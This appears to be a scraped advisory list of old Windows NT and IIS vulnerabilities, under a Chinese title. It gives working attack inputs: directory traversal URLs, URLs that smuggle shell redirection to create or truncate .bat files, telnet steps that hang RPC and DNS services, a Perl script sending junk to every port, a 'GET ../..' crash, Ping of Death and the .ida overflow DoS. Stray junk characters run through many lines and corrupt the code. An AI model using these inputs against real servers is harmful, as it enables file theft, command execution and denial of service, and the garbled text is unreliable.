NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
# L9 x/ ]! P/ @
0 h% ^; |. M# L- a/ EA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

  x, ?5 b+ [% ~, O4 z  FBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
9 m7 ?: s2 q7 ?; b
0 h7 c$ t( i+ }3 o3 RIf the file 'target.bat' exists, the file will be truncated.

& }6 E* k) B( ?/ T' M8 R/ _+ B3 b
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

- c) B  J  ^# e, n) Y; C----------------------------------------------------------------------
0 }. m; @2 Y/ T, m
受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.

- n) ^, X8 U% v7 a2 I8 t" b' nThe following steps;
& g% \5 \4 r! N0 C" x* N
) ~7 d  G3 K0 N% J( r8 w5 UTelnet to an NT 4.0 system on port 135
, c! h, c* Z3 `5 R" g- _Type about 10 characters followed by a <CR>
' o- h3 ?7 V. p, N  iExit Telnet
3 H  n1 }7 ?3 k& M( j6 ~+ H5 Zresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

- e  j6 \' M7 l0 U5 F  z$ uThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

' i2 g) z, E6 }) K9 _The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

  g0 E* D, M+ e" V" `/*begin poke code*/
/ U" g5 T4 A( I1 c1 i- ]; i
use Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;
3 o% G. }6 ]' [5 D3 Q
2 `( G! Y! l. i$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{
+ D. ]5 O5 W3 q

* w2 f* Y: _0 h9 ]0 @3 X& eif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
1 g9 R( ~# m6 `: t}
$fh = chat::open_port($systemname, $port);
# w0 ]/ f9 {" \. C7 A% Xchat::print ($fh,"This is about ten characters or more");
if ($verbose) {
8 k9 b# p$ A% Lprint "Trying port: $port\n";
4 b2 l  F0 E8 |( @; E}
$ e, a" K1 `/ |" V1 ^) y( Lchat::close($fh);

}

% t6 e' i8 i% C  z5 V( e
/*end poke code*/

& A7 G: j' {3 E. ySave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
* G8 \3 w: y8 X7 p
受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
& a) V9 m( l9 ~6 e2 p6 Y
This attack causes Dr. Watson to display an alert window and to log an error:

3 N+ |1 n2 v  u"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
0 a9 [- X# M& m! ?  f% t
--------------------------------------------------------------------------------
  k; \, \, ]9 V' c
7 L" f; G5 k( M! z' |# H受影響系統(tǒng):3.51,4.0
& I  z: s% }5 Z6 d0 {5 cLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-
! `, K3 y% n: r: ]
$ ?% L8 `) c, y9 w5 a& xSTOP: 0x0000000A
+ W# T  ]* ^7 }+ i! eIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

& p% U$ x$ R0 B) d  K: xNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

% e0 U  e# l* Z- S3 f  c--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
8 |: R5 c- o+ \' F, \  i# l
--------------------------------------------------------

1 V' T, ^; e1 I+ n" m6 t) v% D+ WIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server